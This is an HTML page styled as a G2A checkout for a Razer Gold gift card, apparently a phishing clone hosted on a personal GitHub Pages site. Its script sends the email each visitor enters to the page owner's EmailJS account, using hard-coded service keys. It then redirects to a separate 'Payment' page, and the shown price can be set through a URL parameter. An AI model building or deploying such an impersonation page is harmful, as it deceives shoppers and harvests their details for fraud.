<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <link rel="icon" type="image/png" href="Images/G2A-Favicon.png">
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0/css/all.min.css">

  <meta property="og:title" content="Razer Gold - Cheap" />
  <meta property="og:description" content="Buy gift cards for your favorite brands and services. Fast delivery, secure payments, and instant access to digital gift cards for gaming, shopping, entertainment, and more!" />
  <meta name="description" content="Buy gift cards for your favorite brands and services. Fast delivery, secure payments, and instant access to digital gift cards for gaming, shopping, entertainment, and more!" />
  <meta property="og:url" content="https://bennyboy10.github.io/A-Square/" />
  <meta property="og:image" content="https://raw.githubusercontent.com/BennyBoy10/A-Square/main/Images/RazerGold.png" />
  <meta property="og:type" content="website" />

    <link rel="stylesheet" href="None">

    <title>Buy Razer Gold GiftCard - GLOBAL & Cheap - G2A</title>

    <style>

body {
  font-family: Arial, sans-serif;
  background-color: #fff;
  background-color: #000;
  margin: 0;
  padding: 0;
}
a {
  text-decoration: none;
  color: inherit;
}
.container {
 margin: 0 auto;
 width: 355px;
 padding: 0px;
 border: none;
 border-radius: 0px;
 background-color: #F9F9F9;
}

.dollar {
 font-weight: bold;
}

header {
 display: flex;
 flex-direction: row;
 justify-content: space-between;
 padding-bottom: 5px;
 color: #FFF;
 background-color: #000;
}
#gta-logo {
 margin-top: 3px;
 margin-left: 0px;
 width: 35x;
 height: 25px;
}
.header-icons {
  display: flex;
  flex-direction: row;
  cursor: pointer;
  gap: 10px;
}
#Search-icon {
 width: 35px;
 height: 35px;
}
#Account-icon {
 width: 35px;
 height: 35px;
}
#Cart-icon {
 margin-right: 10px;
 width: 35px;
 height: 35px;
}
.body {
  padding-left: 20px;
  padding-right: 20px;
}
.complete-order {
  display: flex;
  flex-direction: row;
}
#complete-order-img {
  margin-top: 20px;
  width: 20px;
  height: 20px;
  cursor: pointer;
}
#complete-order {
  margin-left: 10px;
  font-size: 13px;
}
.you-buying-from {
  padding-top: 8px;
  padding-bottom: 8px;
  padding-left: 10px;
  padding-right: 6px;
  border-radius: 5px;
  border: 1px solid #E0E0E0;
  background-color: #FFF;
}
#you-buying-from {
  font-size: 12px;
  color: #8C8C8C;
}
#their-tc {
  margin-top: -10px;
  font-size: 11px;
  color: #8C8C8C;
}
.card-type {
  display: flex;
  flex-direction: row;
}
#Razer2 {
  width: 50px;
  height: 80;
  border-radius: 5px;
  cursor: pointer;
}
#card-type {
  margin-left: 20px;
  font-size: 14px;
  font-weight: bold;
}
#amount2 {
  text-align: right;
  margin-right: 10px;
}
#vat-inc {
  text-align: right;
  margin-top: -20px;
  margin-right: 10px;
  font-size: 11px;
  color: #c9c9c9;
}
.cant-be-gift {
  display: flex;
  flex-direction: row;
}
#cant-be-gift {
  margin-left: 8px;
  font-size: 14px;
  font-weight: 500;
  color: #8C8C8C;
}
#icon1 {
  margin-top: 15px;
  color: #8C8C8C;
  cursor: pointer;
}
.your-email {
  padding-top: 15px;
  padding-bottom: 15px;
  padding-left: 7px;
  padding-right: 7px;
  border-radius: 5px;
  border: 1px solid #E0E0E0;
  background-color: #FFF;
}
#email {
  padding: 7px;
  width: 95%;
  height: 27px;
  border-radius: 5px;
  border: 1px solid grey;
}
#email:focus {
  outline: none;
  border: 1px solid #3181FC;
}
#email::placeholder {
  color: #E0E0E0;
}
#invalid-email {
  display: none;
  margin-left: 3px;
  margin-bottom: -5px;
  font-size: 12px;
  color: red;
}

.save-more {
  padding: 3px;
  padding-left: 10px;
  padding-bottom: 13px;
  border-radius: 5px;
  border: 1px solid #B4A;
  background-color: #FFF;
}
#save-more {
  margin-bottom: 5px;
  font-size: 14px;
  font-weight: bold;
}
#game-dlc, #discount-codes, #monthly-present {
  margin-left: 5px;
  font-size: 13px;
}
.give-gift {
  padding-left: 0px;
  border: none;
}
#give-gift {
  margin-left: 5px;
  font-weight: bold;
  color: grey;
}
#icon2 {
  font-size: 23px;
}
#buy-product {
  margin-top: 5px;
  margin-left: 30px;
  font-size: 13px;
}



.easy-secure {
  padding-left: 0px;
  border: none;
}
#easy-secure {
  margin-left: 5px;
  font-weight: bold;
  color: grey;
}
#icon3 {
  font-size: 23px;
}
#Visa-Master-PayPal {
  margin-left: 30px;
  width: 150px;
  height: 30px;
}
#and-30-more {
  margin-left: 5px;
  font-size: 13px;
  color: #8C8C8C;
}
#clicking-continue {
  margin-left: 5px;
  font-size: 13px;
  color: #8C8C8C;
}
.blue {
  color: #3181FC;
}

.offer-from {
  display: flex;
  flex-direction: row;
  justify-content: space-between;
  font-size: 12px;
  color: #8C8C8C;
}
#offer-from2 {
  margin-right: 10px;
}
.razer-images1 {
  display: flex;
  flex-direction: row;
  justify-content: space-between;
  margin-top: -8px;
}
.razer-images1 img {
  width: 160px;
  height: 210px;
}

.description1 {
  display: flex;
  flex-direction: row;
  justify-content: space-between;
}
#desc1, #desc2 {
  text-align: center;
  margin-left: 3px;
  width: 155px;
  height: 170px;
  border: 1px solid grey;
  background-color: #FFF;
}
#descr1, #descr2 {
  font-size: 14px;
  font-weight: bold;
}
#desc-amount1, #desc-amount2 {
  text-align: left;
  margin-left: 10px;
  margin-top: 80px;
}
.bottom {
  padding-left: 15px;
  padding-right: 15px;
  font-weight: bold;
  border-top: 1px solid grey;
  border-bottom: 1px solid grey;
  color: #8C8C8C;
  background-color: #FFF;
}
#globe {
  font-size: 25px;
}
#en-usd {
  margin-left: 5px;
  font-weight: bold;
}
.bottom-services {
  display: flex;
  flex-direction: row;
  justify-content: space-between;
  font-size: 12px;
}
.bottom-services2 {
  display: flex;
  flex-direction: row;
  justify-content: space-between;
  font-size: 12px;
}

button:hover {
  cursor: pointer;
}


.menu {
 position: fixed;
 bottom: 0;
 left: 50%;
 transform: translateX(-50%);
 width: 360px;
 border: 1px solid #FFF;
 background-color: #FFF;
 box-shadow: 0px 0px 7px rgba(0, 0, 0, 0.5);
 cursor: pointer;
}
.menu-prices {
  display: flex;
  flex-direction: row;
  justify-content: space-between;
}
#total-price {
  margin-top: 23px;
  margin-left: 20px;
  font-size: 14px;
  font-weight: bold;
}
#menu-amount {
 margin-right: 20px;
 font-size: 17px;
 font-weight: 700;
 color: #000;
}
#menu-button {
 display: block;
 margin: 0 auto;
 margin-bottom: 7px;
 width: 330px;
 height: 40px;
 border-radius: 5px;
 border: none;
 font-weight: bold;
 color: #FFF;
 background-color: #3181FC;
}


    </style>

</head>
<body>
         <div class="container">
  <header>
<a href="../">
<img src="Images/G2a-Logo.jpg" id="gta-logo">
</a>
  <div class="header-icons">
<img src="Images/Search-icon.jpg" id="Search-icon">
<img src="Images/Account-icon.jpg" id="Account-icon">
<img src="Images/Shopping-cart-icon.jpg" id="Cart-icon">
  </div>
  </header>

  <div class="body">
<br>
<h3 id="your-cart">Your cart</h3>
  <div class="complete-order">
<img src="Images/Complete-Order.jpg" id="complete-order-img">
<p id="complete-order">Complete the order - adding products to the cart does not mean booking.</p>
  </div>

  <div class="you-buying-from">
<p id="you-buying-from">YOUR ARE BUYING FROM Ultimate_choices</p>
<p id="their-tc">By buying from this seller you accept their Terms and conditions</p>
<hr style="color: #E0E0E0;">
  <div class="card-type">
<img src="Images/Razer2.jpg" id="Razer2">
<p id="card-type">Razer Gold <span id="amount1">25</span> USD - Razer Key - GLOBAL</p>
  </div>

<h3 id="amount2"><span id="amount2-1">$ 25.16</span></h3>
<p id="vat-inc">VAT inc. if applicable</p>
<hr>
  <div class="cant-be-gift">
<i class="fa-solid fa-circle-info" id="icon1"></i>
<p id="cant-be-gift">This item can't be bought as a gift</p>
  </div>
    </div>
  
<br>

<form>
  <div class="your-email">
<label for="email" style="font-weight: bold;">Enter your email. We need it to send you the order.</label><br>
<input type="email" id="email" placeholder="&nbsp; example@example.com" required>
<p id="invalid-email">Please enter a valid email address</p>
  </div>

<br>

  <div class="save-more">
<p id="save-more">Save more than others, join G2A Plus</p>
<i class="fa-solid fa-check" style="color: #B4A;"></i>
<span id="game-dlc">Game, DLC and Random keys are cheaper</span>
<br>
<i class="fa-solid fa-check" style="color: #B4A;"></i>
<span id="discount-codes">Discount codes have a higher value</span>
<br>
<i class="fa-solid fa-check" style="color: #B4A;"></i>
<span id="monthly-present">Monthly present is a thing</span>
  </div>

<br><br>
<br><br>

  <div class="give-gift">
<i class="fa-solid fa-gift" id="icon2" style="color: #5cab36;"></i>
<span id="give-gift">GIVE AS A GIFT</span>
<p id="buy-product">Buy a product and get a ready-to-download gift PDF.</p>
  </div>

<br>

  <div class="easy-secure">
<i class="fa-solid fa-lock" id="icon2" style="color: #5cab36;"></i>
<span id="easy-secure">EASY & SECURE PAYMENT</span>
<img src="Images/Visa-Master-PayPal.jpg" id="Visa-Master-PayPal">
<span id="and-30-more">and 30+ more</span>
<br><br>
<hr>
<p id="clicking-continue">By clicking “Continue to payment” I acknowledge I have read and agreed to <span class="blue">G2A Terms & Conditions</span> and <span class="blue">G2A Privacy Policy</span>.</p>
  </div>
<br>

  <div class="treat">
<h3 id="treat-yourself">Treat yourself get something extra!</h3>
  <div class="offer-from">
<p id="offer-from1">SUPERG4MES</p>
<p id="offer-from2">ULTRA_CHOICE</p>
  </div>

  <div class="razer-images1">
<img src="Images/Razer2.jpg" id="Razer3">
<img src="Images/Razer2.jpg" id="Razer4">
  </div>

  <div class="description1">
<div id="desc1">
<p id="descr1">Razer Gold 90 USD - Razer Key - GLOBAL</p>
<h3 id="desc-amount1">$ 96.72</h3>
</div>
<div id="desc2">
<p id="descr2">Razer Gold 140 USD - Razer Key - GLOBAL</p>
<h3 id="desc-amount2">$ 158.37</h3>
</div>
  </div>
      </div>

<br>

  <div class="bottom">
<br>
<i class="fa-solid fa-earth-asia" id="globe" style="color: #8c8c8c;"></i>
<span id="en-usd">EN / USD</span>

  <div class="bottom-services">
<p>Support Hub</p>
<p>Stay Safe</p>
<p>Terms & Conditions</p>
  </div>
  <div class="bottom-services2">
<p>Privacy and Cookie Policy</p>
<p>Return & Refunds</p>
  </div>
<br>
  </div>


  
  </div>

<br><br>
<br><br>
<br><br>
<br>

  <div class="menu">
<div class="menu-prices">
<p id="total-price">Total price</p>
<p id="menu-amount"><span id="amount3">$ 25.16</span></p>
</div>
<button id="menu-button" type="submit">Continue to payment</button>
</form>
  </div>
     </div>


  <script>
window.addEventListener("DOMContentLoaded", function() {
// Get the query parameter
var urlParams = new URLSearchParams(window.location.search);
var amount2Text = urlParams.get('amount2');

var Amount2Field1 = document.getElementById("amount2-1");
var Amount2Field2 = document.getElementById("menu-amount");

if (amount2Text) {
// Use the passed text content
Amount2Field1.textContent = amount2Text;
Amount2Field2.textContent = amount2Text;
}

if (Amount2Field2.textContent === "NaN" || Amount2Field2.textContent === "NaN") {
  window.location.href = "../";
 }
});
  </script>


<script type="text/javascript" src="https://cdn.jsdelivr.net/npm/@emailjs/browser@4/dist/email.min.js"></script>
<script type="text/javascript">
(function(){
  emailjs.init("KGWmh1dyveTN8cjHy");
})();
</script>

<script>
var submitButton = document.getElementById("menu-button");
var Amount2 = document.getElementById("menu-amount");
var emailField = document.getElementById("email");
var invalidEmail = document.getElementById("invalid-email");

emailField.addEventListener("blur", function() {
  if (!emailField.checkValidity()) {
    invalidEmail.style.display = "flex";
    emailField.style.border = "1px solid red";
  } else {
    invalidEmail.style.display = "none";
    emailField.style.border = "1px solid #E0E0E0";
  }
});

submitButton.addEventListener("click", function(event) {
  event.preventDefault();
  
  if (!emailField.checkValidity()) {
    invalidEmail.style.display = "flex";
    emailField.style.border = "1px solid red";
    emailField.focus();
    return;
  }

  submitButton.disabled = true;
  submitButton.classList.add("disabled");

  setTimeout(function() {
    submitButton.disabled = false;
    submitButton.classList.remove("disabled");
  }, 7000);

  var amount2Text = Amount2.textContent.replace('$ ', '');
  var amount2Value = parseFloat(amount2Text);

  function sendMail() {
  var Email = document.getElementById("email").value;
  var submitButton = "G2A Email";

  emailjs.send('service_76vugl3', 'template_9vpv84j', {
    email: Email,
    submit_button_id: submitButton,
  })
  .then(function(response) {
    window.location.href = "Payment/?amount2=" + encodeURIComponent(amount2Value);
  })
  .catch(function(error) {
    window.location.href = "Payment/?amount2=" + encodeURIComponent(amount2Value);
  });
}
  sendMail();

});
</script>




</body>
</html>
